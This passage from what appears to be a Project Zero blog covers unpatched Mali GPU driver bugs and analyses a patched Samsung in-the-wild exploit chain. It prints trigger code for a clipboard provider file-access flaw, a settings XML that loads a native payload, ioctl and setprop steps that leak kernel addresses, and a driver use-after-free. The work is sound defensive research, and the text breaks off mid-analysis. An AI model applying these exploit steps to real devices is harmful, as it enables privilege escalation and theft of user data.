There are new articles available, click to refresh the page.
Before yesterdayGoogle Project Zero

Mind the Gap

22 November 2022 at 21:05

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable. 

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in the wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title                    Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE                   CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue      6th January 2022

Impact                A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) lead to kernel memory corruption, one (2331) lead to physical memory addresses being disclosed to userspace and the remaining three (2325, 2327, 2333) lead to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

@ProjectZeroBugs\nArm Mali: driver exposes physical addresses to unprivileged userspace\n\n  @jgrusko Replying to @ProjectZeroBugs\nRIP the feature that was there forever and nobody wanted to report :)

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.

Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 November 2022 at 15:50

Maddie Stone, Project Zero


Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date under settings you can check that your device is running SMR Mar-2021 or later.


As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendor’s transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.


While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes. 


We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products. 

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.


The sample used three vulnerabilities, all patched in March 2021 by Samsung: 

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337

  2. Kernel information leak via sec_log - CVE-2021-25369

  3. Use-after-free the Display Processing Unit (DPU) driver - CVE-2021-25370


The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC and phones sold most other places (ex. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver which are specific to the Exynos Samsung phones.


Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.


The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June. 

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user. 


Screenshot of the CVE-2021-25337 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19527 (CVE-2021-25337): Arbitrary file read/write vulnerability via unprotected clipboard content provider  Severity: Moderate Affected versions: P(9.0), Q(10.0), R(11.0) devices except ONEUI 3.1 in R(11.0) Reported on: November 3, 2020 Disclosure status: Privately disclosed. An improper access control in clipboard service prior to SMR MAR-2021 Release 1 allows untrusted applications to read or write arbitrary files in the device. The patch adds the proper caller check to prevent improper access to clipboard service.

About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.


According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.


Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:
DATABASE_NAME = ‘clipboardimage.db’

TABLE_NAME = ‘ClipboardImageTable’

URL = ‘content://com.sec.android.semclipboardprovider/images’

CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";


Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.  


UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead, its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>


Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor


    public Uri insert(Uri uri, ContentValues values) {

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }


The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.


The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.


ContentValues vals = new ContentValues();

vals.put("_data", "/data/system/users/0/newFile.bin");

URI semclipboard_uri = URI.parse("content://com.sec.android.semclipboardprovider")

ContentResolver resolver = getContentResolver();

URI newFile_uri = resolver.insert(semclipboard_uri, vals);

return resolver.openFileDescriptor(newFile_uri, "w").getFd(); 


Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.

  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.

  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.

  4. Get the ContentResolver object that allows apps access to ContentProviders.

  5. Call insert on the semclipboardprovider with our key-value pair.

  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.


The exploit wrote their next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_app’s don’t have access to open or create users_system_data_file files so in this case they are proxying the open through system_server who can open users_system_data_file. While untrusted_app can’t open users_system_data_file, it can read and write to users_system_data_file. Once the clipboard content provider opens the file and passess the fd to the calling process, the calling process can now read and write to it.


The exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.


This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks if the PID of the calling process is UID 1000, meaning that it is already also running with system privileges.


  public Uri insert(Uri uri, ContentValues values) {

        if (Binder.getCallingUid() != 1000) {

            Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));

            return null;

        }

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).


The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.


Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API. 


The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.


To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.


<?xml version='1.0' encoding='utf-8' standalone='yes' ?>

      <map>

          <string name=\"eng-USA-Variant Info\">f00</string>\n"

          <string name=\"SMT_STUBCHECK_STATUS\">STUB_SUCCESS</string>\n"

          <string name=\"SMT_LATEST_INSTALLED_ENGINE_PATH\">/data/system/users/0/newFile.bin</string>\n"

      </map>


The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context. 


The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems like devices released on Android 10 (Q) were released with the updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.


Phones released on Android P and earlier seemed to have a version of the app pre-3.0.08.18 which does load the executable up through December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file. 


Once the ELF file is loaded via the System.load api, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second stage ELF is running (and as system), the exploit then continued. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.


The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.


Screenshot of the CVE-2021-25369 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19897 (CVE-2021-25369): Potential kernel information exposure from sec_log  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0) Reported on: December 10, 2020 Disclosure status: Privately disclosed. An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace. The patch removes vulnerable file.


The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg


oid __warn(const char *file, int line, void *caller, unsigned taint,

            struct pt_regs *regs, struct warn_args *args)

{

        disable_trace_on_warning();


        pr_warn("------------[ cut here ]------------\n");


        if (file)

                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",

                        raw_smp_processor_id(), current->pid, file, line,

                        caller);

        else

                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",

                        raw_smp_processor_id(), current->pid, caller);


        if (args)

                vprintk(args->fmt, args->args);


        if (panic_on_warn) {

                /*

                 * This thread may hit another WARN() in the panic path.

                 * Resetting this prevents additional WARN() from panicking the

                 * system on this thread.  Other threads are blocked by the

                 * panic_mutex in panic().

                 */

                panic_on_warn = 0;

                panic("panic_on_warn set ...\n");

        }


        print_modules();


        dump_stack();


        print_oops_end_marker();


        /* Just a warning, don't kill lockdep. */

        add_taint(taint, LOCKDEP_STILL_OK);

}



On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 


a51:/ $ ls -alZ /dev/kmsg

crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg


$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy

allow domain dev_type:lnk_file { getattr ioctl lock map open read };

allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };


Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log


The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F)  still used a vulnerable version of the driver (r19p0) as of January 2021.  



/**

 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.

 * @filp:   Non-NULL pointer to file structure.

 * @cmd:    User command.

 * @arg:    Command's argument.

 *

 * Return: 0 on success, else error code.

 */

static long kbasep_vinstr_hwcnt_reader_ioctl(

        struct file *filp,

        unsigned int cmd,

        unsigned long arg)

{

        long rcode;

        struct kbase_vinstr_client *cli;


        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))

                return -EINVAL;


        cli = filp->private_data;

        if (!cli)

                return -EINVAL;


        switch (cmd) {

        case KBASE_HWCNT_READER_GET_API_VERSION:

                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_HWVER:

                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(

                        cli, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:

                rcode = put_user(

                        (u32)cli->vctx->metadata->dump_buf_bytes,

                        (u32 __user *)arg);

                break;

        

        [...]


        default:

                WARN_ON(true);

                rcode = -EINVAL;

                break;

        }


        return rcode;

}


Specifically the WARN_ON is in the function kbase_vinstr_hwcnt_reader_ioctl. To trigger, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP ioctl to initialize the hwcnt driver and be able to call ioctl’s and then to the hwcnt ioctl target with an invalid ioctl number: 0xFE.


  hwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);

   ioctl(hwcnt_fd, 0x4004BEFE, 0);


To trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:


setprop dumpstate.options bugreportfull;

setprop ctl.start bugreport;


In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport. 


allow at_distributor ctl_start_prop:file { getattr map open read };

allow at_distributor ctl_start_prop:property_service set;

allow bootchecker ctl_start_prop:file { getattr map open read };

allow bootchecker ctl_start_prop:property_service set;

allow dumpstate property_type:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:property_service set;

allow ikev2_client ctl_start_prop:file { getattr map open read };

allow ikev2_client ctl_start_prop:property_service set;

allow init property_type:file { append create getattr map open read relabelto rename setattr unlink write };

allow init property_type:property_service set;

allow keystore ctl_start_prop:file { getattr map open read };

allow keystore ctl_start_prop:property_service set;

allow mediadrmserver ctl_start_prop:file { getattr map open read };

allow mediadrmserver ctl_start_prop:property_service set;

allow multiclientd ctl_start_prop:file { getattr map open read };

allow multiclientd ctl_start_prop:property_service set;

allow radio ctl_start_prop:file { getattr map open read };

allow radio ctl_start_prop:property_service set;

allow shell ctl_start_prop:file { getattr map open read };

allow shell ctl_start_prop:property_service set;

allow surfaceflinger ctl_start_prop:file { getattr map open read };

allow surfaceflinger ctl_start_prop:property_service set;

allow system_app ctl_start_prop:file { getattr map open read };

allow system_app ctl_start_prop:property_service set;

allow system_server ctl_start_prop:file { getattr map open read };

allow system_server ctl_start_prop:property_service set;

allow vold ctl_start_prop:file { getattr map open read };

allow vold ctl_start_prop:property_service set;

allow wlandutservice ctl_start_prop:file { getattr map open read };

allow wlandutservice ctl_start_prop:property_service set;


The bugreport service is defined in /system/etc/init/dumpstate.rc:


service bugreport /system/bin/dumpstate -d -p -B -z \

        -o /data/user_de/0/com.android.shell/files/bugreports/bugreport

    class main

    disabled

    oneshot


The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.


The Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. This is the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log (symbols included within the binary) function copies everything from the path provided in argument two to the path provided in argument three.


  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));

  LOBYTE(s) = 18;

  v650[0] = 0LL;

  s_8 = 17664LL;

  *(char **)((char *)&s + 1) = *(char **)"DUMPSTATE";

  DurationReporter::DurationReporter(v636, (__int64)&s, 0);

  if ( ((unsigned __int8)s & 1) != 0 )

    operator delete(v650[0]);

  dump_sec_log("SEC LOG", "/proc/sec_log", "/data/log/sec_log.log");


After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed. So this watch will occur when dumpstate is finished writing to sec_log.log.


An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values on the stack that are at address *b60 and *bc0: the task_struct and the sys_call_table address.


<4>[90808.635627]  [4:    poc:25943] ------------[ cut here ]------------

<4>[90808.635654]  [4:    poc:25943] WARNING: CPU: 4 PID: 25943 at drivers/gpu/arm/b_r19p0/mali_kbase_vinstr.c:992 kbasep_vinstr_hwcnt_reader_ioctl+0x36c/0x664

<4>[90808.635663]  [4:    poc:25943] Modules linked in:

<4>[90808.635675]  [4:    poc:25943] CPU: 4 PID: 25943 Comm: poc Tainted: G        W       4.14.113-20034833 #1

<4>[90808.635682]  [4:    poc:25943] Hardware name: Samsung BEYOND1LTE EUR OPEN 26 board based on EXYNOS9820 (DT)

<4>[90808.635689]  [4:    poc:25943] Call trace:

<4>[90808.635701]  [4:    poc:25943] [<0000000000000000>] dump_backtrace+0x0/0x280

<4>[90808.635710]  [4:    poc:25943] [<0000000000000000>] show_stack+0x18/0x24

<4>[90808.635720]  [4:    poc:25943] [<0000000000000000>] dump_stack+0xa8/0xe4

<4>[90808.635731]  [4:    poc:25943] [<0000000000000000>] __warn+0xbc/0x164tv

<4>[90808.635738]  [4:    poc:25943] [<0000000000000000>] report_bug+0x15c/0x19c

<4>[90808.635746]  [4:    poc:25943] [<0000000000000000>] bug_handler+0x30/0x8c

<4>[90808.635753]  [4:    poc:25943] [<0000000000000000>] brk_handler+0x94/0x150

<4>[90808.635760]  [4:    poc:25943] [<0000000000000000>] do_debug_exception+0xc8/0x164

<4>[90808.635766]  [4:    poc:25943] Exception stack(0xffffff8014c2bb40 to 0xffffff8014c2bc80)

<4>[90808.635775]  [4:    poc:25943] bb40: ffffffc91b00fa40 000000004004befe 0000000000000000 0000000000000000

<4>[90808.635781]  [4:    poc:25943] bb60: ffffffc061b65800 000000000ecc0408 000000000000000a 000000000000000a

<4>[90808.635789]  [4:    poc:25943] bb80: 000000004004be30 000000000000be00 ffffffc86b49d700 000000000000000b

<4>[90808.635796]  [4:    poc:25943] bba0: ffffff8014c2bdd0 0000000080000000 0000000000000026 0000000000000026

<4>[90808.635802]  [4:    poc:25943] bbc0: ffffff8008429834 000000000041bd50 0000000000000000 0000000000000000

<4>[90808.635809]  [4:    poc:25943] bbe0: ffffffc88b42d500 ffffffffffffffea ffffffc96bda5bc0 0000000000000004

<4>[90808.635816]  [4:    poc:25943] bc00: 0000000000000000 0000000000000124 000000000000001d ffffff8009293000

<4>[90808.635823]  [4:    poc:25943] bc20: ffffffc89bb6b180 ffffff8014c2bdf0 ffffff80084294bc ffffff8014c2bd80

<4>[90808.635829]  [4:    poc:25943] bc40: ffffff800885014c 0000000020400145 0000000000000008 0000000000000008

<4>[90808.635836]  [4:    poc:25943] bc60: 0000007fffffffff 0000000000000001 ffffff8014c2bdf0 ffffff800885014c

<4>[90808.635843]  [4:    poc:25943] [<0000000000000000>] el1_dbg+0x18/0x74


The file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.


$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app


allow aasa_service_app dumplog_data_file:file { getattr ioctl lock map open read };


allow dualdar_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow platform_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow priv_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow system_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow teed_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow vzwfiltered_untrusted_app dumplog_data_file:file { getattr ioctl lock map open read };

Fixing the vulnerability

There were a few different changes to address this vulnerability:

  • Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.

  • Removed the bugreport service from dumpstate.rc.


In addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:

  • As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver which had replaced the WARN_ON with the more appropriate pr_warn which does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0 which used pr_warn instead of WARN_ON.

  • In April 2020, upstream Linux made a change to no longer include raw stack contents in kernel backtraces.


Vulnerability #3 - Arbitrary kernel read and write

The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access. 


Screenshot of the CVE-2021-25370 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19925 (CVE-2021-25370): Memory corruption in dpu driver  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0), R(11.0) devices with selected Exynos chipsets Reported on: December 12, 2020 Disclosure status: Privately disclosed. An incorrect implementation handling file descriptor in dpu driver prior to SMR Mar-2021 Release 1 results in memory corruption leading to kernel panic. The patch fixes incorrect implementation in dpu driver to address memory corruption.

Find the PID of android.hardware.graphics.composer

To be able to trigger the vulnerability the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process. 


The exploit connects to LogReader which listens at /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:


stream lids=0,3,4


The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’. Once it finds a ‘display’ or ‘SDM’ log entry, the exploit then reads the PID from that log entry.


Now it has the PID of android.hardware.graphics.composer, where android.hardware.graphics composer is the Hardware Composer HAL.


Next the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path. 


Triggering the Use-After-Free

The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes. 


/**

 * struct sync_file - sync file to export to the userspace

 * @file:               file representing this fence

 * @sync_file_list:     membership in global file list

 * @wq:                 wait queue for fence signaling

 * @fence:              fence with the fences in the sync_file

 * @cb:                 fence callback information

 */

struct sync_file {

        struct file             *file;

        /**

         * @user_name:

         *

         * Name of the sync file provided by userspace, for merged fences.

         * Otherwise generated through driver callbacks (in which case the

         * entire array is 0).

         */

        char                    user_name[32];

#ifdef CONFIG_DEBUG_FS

        struct list_head        sync_file_list;

#endif


        wait_queue_head_t       wq;

        unsigned long           flags;


        struct dma_fence        *fence;

        struct dma_fence_cb cb;

};


The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.


static int decon_set_win_config(struct decon_device *decon,

                struct decon_win_config_data *win_data)

{

        int num_of_window = 0;

        struct decon_reg_data *regs;

        struct sync_file *sync_file;

        int i, j, ret = 0;


[...]


        num_of_window = decon_get_active_win_count(decon, win_data);

        if (num_of_window) {

                win_data->retire_fence = decon_create_fence(decon, &sync_file);

                if (win_data->retire_fence < 0)

                        goto err_prepare;

        } else {


[...]


        if (num_of_window) {

                fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }


[...]


        return ret;

}


In this case, decon_set_win_config acquires the fd for retire_fence in decon_create_fence.


int decon_create_fence(struct decon_device *decon, struct sync_file **sync_file)

{

        struct dma_fence *fence;

        int fd = -EMFILE;


        fence = kzalloc(sizeof(*fence), GFP_KERNEL);

        if (!fence)

                return -ENOMEM;


        dma_fence_init(fence, &decon_fence_ops, &decon->fence.lock,

                   decon->fence.context,

                   atomic_inc_return(&decon->fence.timeline));


        *sync_file = sync_file_create(fence);

        dma_fence_put(fence);

        if (!(*sync_file)) {

                decon_err("%s: failed to create sync file\n", __func__);

                return -ENOMEM;

        }


        fd = decon_get_valid_fd();

        if (fd < 0) {

                decon_err("%s: failed to get unused fd\n", __func__);

                fput((*sync_file)->file);

        }


        return fd;

}


